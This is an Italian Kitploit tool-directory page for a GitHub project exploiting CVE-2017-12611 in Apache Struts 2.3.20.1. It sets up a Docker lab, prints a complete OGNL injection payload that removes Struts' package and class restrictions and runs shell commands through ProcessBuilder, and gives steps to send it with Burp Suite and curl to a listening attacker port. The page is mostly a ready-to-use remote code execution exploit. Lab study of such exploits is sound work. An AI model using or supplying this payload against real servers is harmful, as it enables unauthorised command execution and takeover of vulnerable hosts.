Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2017-12611_Exploit — Progetto RCE | Kitploit
Strumenti/GitHubGitHub/zeynepsilao/cve-2017-12611_exploit
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingLab e Pratica
GitHubzeynepsilao/cve-2017-12611_exploit

CVE-2017-12611_Exploit

Progetto RCE

Vedi Repository
11 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Progetto CVE-2017-12611

Panoramica:

Un attacco RCE è possibile con il payload fornito.

Ambiente e Strumenti

Di seguito sono elencati gli ambienti e gli strumenti per test e validazione in un laboratorio personale isolato.

  • Sistema operativo host: Ubuntu 18.04.6
  • Sistema operativo attaccante: Kali Linux
  • Piattaforma container: Docker
  • Stack applicativo target: Apache Struts 2.3.20.1
  • Componenti aggiuntivi: Burp Suite

Configurazione dell'ambiente:

Utilizzando il seguente comando:

root@kitploit:~
docker compose up -d 

Puoi avviare l'ambiente. Dopodiché puoi vedere una pagina di sottomissione visitando http://<YOUR_IP>:8080/hello.action.

Payload:

%{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}

Per eseguire un attacco RCE è necessario utilizzare Burp Suite. Durante l'uso di Burp Suite, invia il payload. Dopo aver inviato il payload, individua il log corretto (POST) e convertilo in un comando curl. Infine, apri la tua macchina attaccante e mettiti in ascolto sulla porta dopo aver inviato il tuo comando curl dalla porta del listener.

Note:

Le aree censurate sono indirizzi IP.

Scarica lo strumento